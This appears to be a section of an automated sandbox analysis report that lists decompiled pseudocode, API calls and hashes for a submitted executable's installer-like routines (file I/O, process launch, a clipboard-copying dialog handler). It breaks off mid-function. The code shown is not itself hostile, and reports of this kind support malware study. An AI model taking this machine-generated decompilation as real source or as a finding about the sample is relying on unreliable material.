                                                          • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                          • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405C16(WCHAR* _a4) {
                                                          				int _t2;
                                                          
                                                          				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				return 0;
                                                          			}




                                                          0x00405c1c
                                                          0x00405c24
                                                          0x00000000
                                                          0x00405c2a
                                                          0x00000000

                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                          • GetLastError.KERNEL32 ref: 00405C2A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                          • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                          • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                          • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040620A(void* _a4, void* _a8, long _a12) {
                                                          				int _t7;
                                                          				long _t11;
                                                          
                                                          				_t11 = _a12;
                                                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                          					return 0;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}





                                                          0x0040620e
                                                          0x0040621e
                                                          0x00406226
                                                          0x00000000
                                                          0x0040622d
                                                          0x00000000
                                                          0x0040622f

                                                          APIs
                                                          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040D0FE,0040CEF0,00403579,0040CEF0,0040D0FE,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004061DB(void* _a4, void* _a8, long _a12) {
                                                          				int _t7;
                                                          				long _t11;
                                                          
                                                          				_t11 = _a12;
                                                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                          					return 0;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}





                                                          0x004061df
                                                          0x004061ef
                                                          0x004061f7
                                                          0x00000000
                                                          0x004061fe
                                                          0x00000000
                                                          0x00406200

                                                          APIs
                                                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                          • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                          • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004035F8(long _a4) {
                                                          				long _t2;
                                                          
                                                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                          				return _t2;
                                                          			}




                                                          0x00403606
                                                          0x0040360c

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E00401FA4() {
                                                          				void* _t9;
                                                          				char _t13;
                                                          				void* _t15;
                                                          				void* _t17;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          
                                                          				_t19 = E00402DA6(_t15);
                                                          				E004056CA(0xffffffeb, _t7);
                                                          				_t9 = E00405C4B(_t19); // executed
                                                          				_t20 = _t9;
                                                          				if(_t20 == _t15) {
                                                          					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                          				} else {
                                                          					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                          						_t13 = E00406AE0(_t17, _t20); // executed
                                                          						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                          							if(_t13 != _t15) {
                                                          								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                          							}
                                                          						} else {
                                                          							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                          						}
                                                          					}
                                                          					_push(_t20);
                                                          					CloseHandle();
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                          				return 0;
                                                          			}









                                                          0x00401faa
                                                          0x00401faf
                                                          0x00401fb5
                                                          0x00401fba
                                                          0x00401fbe
                                                          0x0040292e
                                                          0x00401fc4
                                                          0x00401fc7
                                                          0x00401fca
                                                          0x00401fd2
                                                          0x00401fe1
                                                          0x00401fe3
                                                          0x00401fe3
                                                          0x00401fd4
                                                          0x00401fd8
                                                          0x00401fd8
                                                          0x00401fd2
                                                          0x00401fea
                                                          0x00401feb
                                                          0x00401feb
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                            • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                            • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                            • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                            • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                            • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                          • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                          • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                          • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                          				struct HWND__* _v8;
                                                          				long _v12;
                                                          				struct tagRECT _v28;
                                                          				void* _v36;
                                                          				signed int _v40;
                                                          				int _v44;
                                                          				int _v48;
                                                          				signed int _v52;
                                                          				int _v56;
                                                          				void* _v60;
                                                          				void* _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				struct HWND__* _t94;
                                                          				long _t95;
                                                          				int _t100;
                                                          				void* _t108;
                                                          				intOrPtr _t130;
                                                          				struct HWND__* _t134;
                                                          				int _t156;
                                                          				int _t159;
                                                          				struct HMENU__* _t164;
                                                          				struct HWND__* _t168;
                                                          				struct HWND__* _t169;
                                                          				int _t171;
                                                          				void* _t172;
                                                          				short* _t173;
                                                          				short* _t175;
                                                          				int _t177;
                                                          
                                                          				_t169 =  *0x429244;
                                                          				_t156 = 0;
                                                          				_v8 = _t169;
                                                          				if(_a8 != 0x110) {
                                                          					if(_a8 == 0x405) {
                                                          						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                          					}
                                                          					if(_a8 != 0x111) {
                                                          						L17:
                                                          						_t171 = 1;
                                                          						if(_a8 != 0x404) {
                                                          							L25:
                                                          							if(_a8 != 0x7b) {
                                                          								goto L20;
                                                          							}
                                                          							_t94 = _v8;
                                                          							if(_a12 != _t94) {
                                                          								goto L20;
                                                          							}
                                                          							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                          							_a8 = _t95;
                                                          							if(_t95 <= _t156) {
                                                          								L36:
                                                          								return 0;
                                                          							}
                                                          							_t164 = CreatePopupMenu();
                                                          							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                          							_t100 = _a16;
                                                          							_t159 = _a16 >> 0x10;
                                                          							if(_a16 == 0xffffffff) {
                                                          								GetWindowRect(_v8,  &_v28);
                                                          								_t100 = _v28.left;
                                                          								_t159 = _v28.top;
                                                          							}
                                                          							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                          								_v60 = _t156;
                                                          								_v48 = 0x423748;
                                                          								_v44 = 0x1000;
                                                          								_a4 = _a8;
                                                          								do {
                                                          									_a4 = _a4 - 1;
                                                          									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                          								} while (_a4 != _t156);
                                                          								OpenClipboard(_t156);
                                                          								EmptyClipboard();
                                                          								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                          								_a4 = _t108;
                                                          								_t172 = GlobalLock(_t108);
                                                          								do {
                                                          									_v48 = _t172;
                                                          									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                          									 *_t173 = 0xd;
                                                          									_t175 = _t173 + 2;
                                                          									 *_t175 = 0xa;
                                                          									_t172 = _t175 + 2;
                                                          									_t156 = _t156 + 1;
                                                          								} while (_t156 < _a8);
                                                          								GlobalUnlock(_a4);
                                                          								SetClipboardData(0xd, _a4);
                                                          								CloseClipboard();
                                                          							}
                                                          							goto L36;
                                                          						}
                                                          						if( *0x42922c == _t156) {
                                                          							ShowWindow( *0x42a268, 8);
                                                          							if( *0x42a2ec == _t156) {
                                                          								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                                          							}
                                                          							E0040459D(_t171);
                                                          							goto L25;
                                                          						}
                                                          						 *0x421f18 = 2;
                                                          						E0040459D(0x78);
                                                          						goto L20;
                                                          					} else {
                                                          						if(_a12 != 0x403) {
                                                          							L20:
                                                          							return E0040462B(_a8, _a12, _a16);
                                                          						}
                                                          						ShowWindow( *0x429230, _t156);
                                                          						ShowWindow(_t169, 8);
                                                          						E004045F9(_t169);
                                                          						goto L17;
                                                          					}
                                                          				}
                                                          				_v52 = _v52 | 0xffffffff;
                                                          				_v40 = _v40 | 0xffffffff;
                                                          				_t177 = 2;
                                                          				_v60 = _t177;
                                                          				_v56 = 0;
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t130 =  *0x42a270;
                                                          				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                          				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                          				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                          				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                          				_t134 = GetDlgItem(_a4, 0x3f8);
                                                          				 *0x429244 = _t134;
                                                          				_v8 = _t134;
                                                          				E004045F9( *0x429230);
                                                          				 *0x429234 = E00404F52(4);
                                                          				 *0x42924c = 0;
                                                          				GetClientRect(_v8,  &_v28);
                                                          				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                          				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                          				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                          				if(_a8 >= 0) {
                                                          					SendMessageW(_v8, 0x1001, 0, _a8);
                                                          					SendMessageW(_v8, 0x1026, 0, _a8);
                                                          				}
                                                          				if(_a12 >= _t156) {
                                                          					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                          				}
                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          				_push(0x1b);
                                                          				E004045C4(_a4);
                                                          				if(( *0x42a278 & 0x00000003) != 0) {
                                                          					ShowWindow( *0x429230, _t156);
                                                          					if(( *0x42a278 & 0x00000002) != 0) {
                                                          						 *0x429230 = _t156;
                                                          					} else {
                                                          						ShowWindow(_v8, 8);
                                                          					}
                                                          					E004045F9( *0x429228);
                                                          				}
                                                          				_t168 = GetDlgItem(_a4, 0x3ec);
                                                          				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                          				if(( *0x42a278 & 0x00000004) != 0) {
                                                          					SendMessageW(_t168, 0x409, _t156, _a12);
                                                          					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                          				}
                                                          				goto L36;
                                                          			}

































                                                          0x00405811
                                                          0x00405817
                                                          0x00405821
                                                          0x00405824
                                                          0x004059ba
                                                          0x004059de
                                                          0x004059de
                                                          0x004059f1
                                                          0x00405a0f
                                                          0x00405a11
                                                          0x00405a19
                                                          0x00405a6f
                                                          0x00405a73
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a75
                                                          0x00405a7b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a85
                                                          0x00405a8d
                                                          0x00405a90
                                                          0x00405b92
                                                          0x00000000
                                                          0x00405b92
                                                          0x00405a9f
                                                          0x00405aaa
                                                          0x00405ab3
                                                          0x00405abe
                                                          0x00405ac1
                                                          0x00405aca
                                                          0x00405ad0
                                                          0x00405ad3
                                                          0x00405ad3
                                                          0x00405aeb
                                                          0x00405af4
                                                          0x00405af7
                                                          0x00405afe
                                                          0x00405b05
                                                          0x00405b0d
                                                          0x00405b0d
                                                          0x00405b24
                                                          0x00405b24
                                                          0x00405b2b
                                                          0x00405b31
                                                          0x00405b3d
                                                          0x00405b44
                                                          0x00405b4d
                                                          0x00405b4f
                                                          0x00405b52
                                                          0x00405b61
                                                          0x00405b64
                                                          0x00405b6a
                                                          0x00405b6b
                                                          0x00405b71
                                                          0x00405b72
                                                          0x00405b73
                                                          0x00405b7b
                                                          0x00405b86
                                                          0x00405b8c
                                                          0x00405b8c
                                                          0x00000000
                                                          0x00405aeb
                                                          0x00405a21
                                                          0x00405a51
                                                          0x00405a59
                                                          0x00405a64
                                                          0x00405a64
                                                          0x00405a6a
                                                          0x00000000
                                                          0x00405a6a
                                                          0x00405a25
                                                          0x00405a2f
                                                          0x00000000
                                                          0x004059f3
                                                          0x004059f9
                                                          0x00405a34
                                                          0x00000000
                                                          0x00405a3d
                                                          0x00405a02
                                                          0x00405a07
                                                          0x00405a0a
                                                          0x00000000
                                                          0x00405a0a
                                                          0x004059f1
                                                          0x0040582a
                                                          0x0040582e
                                                          0x00405836
                                                          0x0040583a
                                                          0x0040583d
                                                          0x00405840
                                                          0x00405843
                                                          0x00405846
                                                          0x00405847
                                                          0x00405848
                                                          0x00405861
                                                          0x00405864
                                                          0x0040586e
                                                          0x0040587d
                                                          0x00405885
                                                          0x0040588d
                                                          0x00405892
                                                          0x00405895
                                                          0x004058a1
                                                          0x004058aa
                                                          0x004058b3
                                                          0x004058d5
                                                          0x004058db
                                                          0x004058ec
                                                          0x004058f1
                                                          0x004058ff
                                                          0x0040590d
                                                          0x0040590d
                                                          0x00405912
                                                          0x00405920
                                                          0x00405920
                                                          0x00405925
                                                          0x00405928
                                                          0x0040592d
                                                          0x00405939
                                                          0x00405942
                                                          0x0040594f
                                                          0x0040595e
                                                          0x00405951
                                                          0x00405956
                                                          0x00405956
                                                          0x0040596a
                                                          0x0040596a
                                                          0x0040597e
                                                          0x00405987
                                                          0x00405990
                                                          0x004059a0
                                                          0x004059ac
                                                          0x004059ac
                                                          0x00000000

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00405867
                                                          • GetDlgItem.USER32 ref: 00405876
                                                          • GetClientRect.USER32 ref: 004058B3
                                                          • GetSystemMetrics.USER32 ref: 004058BA
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                          • ShowWindow.USER32(?,00000008), ref: 00405956
                                                          • GetDlgItem.USER32 ref: 00405977
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                          • GetDlgItem.USER32 ref: 00405885
                                                            • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                          • GetDlgItem.USER32 ref: 004059C9
                                                          • CreateThread.KERNEL32 ref: 004059D7
                                                          • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                          • ShowWindow.USER32(00000000), ref: 00405A02
                                                          • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                          • ShowWindow.USER32(00000008), ref: 00405A51
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                          • CreatePopupMenu.USER32 ref: 00405A96
                                                          • AppendMenuW.USER32 ref: 00405AAA
                                                          • GetWindowRect.USER32 ref: 00405ACA
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                          • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                          • EmptyClipboard.USER32 ref: 00405B31
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                          • GlobalLock.KERNEL32 ref: 00405B47
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                          • SetClipboardData.USER32 ref: 00405B86
                                                          • CloseClipboard.USER32 ref: 00405B8C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: H7B${
                                                          • API String ID: 590372296-2256286769
                                                          • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                          • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                          • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                          • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				long _v16;
                                                          				long _v20;
                                                          				long _v24;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				long _v36;
                                                          				char _v40;
                                                          				unsigned int _v44;
                                                          				signed int _v48;
                                                          				WCHAR* _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				WCHAR* _v72;
                                                          				void _v76;
                                                          				struct HWND__* _v80;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr _t82;
                                                          				long _t87;
                                                          				short* _t89;
                                                          				void* _t95;
                                                          				signed int _t96;
                                                          				int _t109;
                                                          				signed short _t114;
                                                          				signed int _t118;
                                                          				struct HWND__** _t122;
                                                          				intOrPtr* _t138;
                                                          				WCHAR* _t146;
                                                          				unsigned int _t150;
                                                          				signed int _t152;
                                                          				unsigned int _t156;
                                                          				signed int _t158;
                                                          				signed int* _t159;
                                                          				signed int* _t160;
                                                          				struct HWND__* _t166;
                                                          				struct HWND__* _t167;
                                                          				int _t169;
                                                          				unsigned int _t197;
                                                          
                                                          				_t156 = __edx;
                                                          				_t82 =  *0x422720;
                                                          				_v32 = _t82;
